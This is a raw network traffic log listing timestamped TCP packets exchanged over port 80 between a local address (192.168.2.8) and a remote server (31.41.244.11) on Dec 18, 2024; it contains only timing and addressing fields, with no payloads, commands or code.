Dec 18, 2024 13:38:38.025693893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.025789022 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.026837111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.026849985 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.026912928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.026932955 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.028063059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.028079033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.028131962 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.031158924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.031230927 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.032108068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.032120943 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.032181025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.033653021 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.033664942 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.033719063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.034872055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.034885883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.034930944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.036139965 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.036154032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.036243916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.036243916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.036441088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.036503077 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.037533998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.037547112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.037631035 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.038889885 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.038903952 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.038959980 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.040307999 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.040397882 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.040497065 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.040541887 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.041769028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.041781902 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.041830063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.043148994 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.043219090 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.044409037 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.044421911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.044476032 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.045753956 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.045823097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.047375917 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.047388077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.047451973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.048515081 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.048527002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.048576117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.049912930 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.049926043 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.049983025 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.051265001 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.051276922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.051331997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.052669048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.052681923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.052691936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.052732944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.052756071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.054049015 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.054061890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.054111958 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.055676937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.055737019 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.056888103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.056900024 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.056910992 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.056941986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.056965113 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.058291912 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.058304071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.058351040 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.059726000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.059777021 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.061064959 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.061078072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.061125994 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.063723087 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.063735962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.063775063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.063860893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.065139055 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.065150976 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.065259933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.069402933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.069417000 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.069426060 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.069473028 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.069488049 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.070875883 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.070898056 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.070930004 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.070943117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.072082996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.072101116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.072137117 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.072164059 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.073235035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.073247910 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.073293924 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.074727058 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.074739933 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.074749947 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.074793100 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.074832916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.076380014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.076392889 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.076440096 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.080202103 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.080388069 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.081531048 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.081543922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.081553936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.081614971 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.081634045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.082849026 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.082861900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.082920074 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.084328890 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.084342003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.084393024 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.085652113 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.085665941 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.085675001 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.085719109 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.085740089 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.092432022 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.092446089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.092545986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.093962908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.093981981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.093991995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.094034910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.094048023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.095220089 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.095232010 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.095284939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.096581936 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.096637964 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.098006964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.098059893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.099370003 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.099381924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.099392891 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.099421978 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.099447012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.100794077 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.100840092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.102092028 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.102138042 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.208739996 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.208839893 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.209037066 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.209096909 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.209642887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.209703922 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.210386038 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.210442066 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.210963011 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.210978031 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.211019039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.211050987 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.212158918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.212208986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.212601900 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.212614059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.212649107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.212671995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.213895082 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.213949919 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.215215921 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.215229034 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.215240955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.215276957 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.215292931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.216552019 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.216563940 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.216619015 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.217742920 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.217756033 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.217799902 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.217827082 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.218997002 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.219008923 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.219048023 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.219089985 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.220274925 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.220287085 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.220324039 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.220336914 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.221688032 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.221700907 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.221743107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.223077059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.223090887 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.223145962 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.224332094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.224345922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.224396944 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.224426031 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.225766897 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.225780964 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.225790977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.225820065 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.225832939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.227073908 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.227128983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.228611946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.228625059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.228660107 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.228672981 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.229823112 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.229835987 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.229875088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.231235981 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.231249094 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.231260061 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.231296062 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.231317043 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.232631922 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.232645035 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.232693911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.232732058 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.234169006 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.234181881 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.234236002 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.235331059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.235346079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.235382080 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.235394955 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.236848116 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.236861944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.236901999 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.238040924 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.238061905 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.238079071 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.238086939 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.238120079 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.239490986 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.239504099 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.239553928 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.239567041 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.240955114 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.240967989 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.241008997 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.241022110 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.242474079 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.242486954 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.242559910 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.242610931 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.243947029 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.243959904 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.243971109 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.244003057 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.244033098 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.245304108 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.245316982 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.245352983 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.246556997 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.246568918 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.246627092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.247859955 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.247873068 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.247919083 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.247951984 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.249201059 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.249216080 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.249258995 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.249270916 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.250545025 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.250597954 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.251866102 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.251878977 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.251929045 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.253223896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.253237009 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.253289938 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.253302097 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.254580975 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.254594088 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.254637003 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.254651070 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.256092072 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.256104946 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.256114960 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.256154060 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.256174088 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.257282972 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.257330894 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.259335041 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.259346962 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.259357929 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.259387016 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.259414911 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.260169983 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.260220051 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.261492014 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.261538029 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.262954950 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.262967110 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.263009071 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.264154911 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.264168978 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.264205933 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.264218092 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.265963078 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.265974998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.265985966 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.266015053 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.266046047 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.267303944 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.267323017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.267354012 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.267369986 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.268326998 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.268340111 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.268349886 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.268378973 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.268390894 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.272449017 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.272463083 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.272473097 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.272501945 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.272531033 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.273767948 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.273780107 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.273830891 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.275379896 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.275409937 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.275434017 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.275449991 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.276526928 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.276540995 CET	80	49715	31.41.244.11	192.168.2.8
Dec 18, 2024 13:38:38.276591063 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.276603937 CET	49715	80	192.168.2.8	31.41.244.11
Dec 18, 2024 13:38:38.277996063 CET	80	49715	31.41.244.11	192.168.2.8
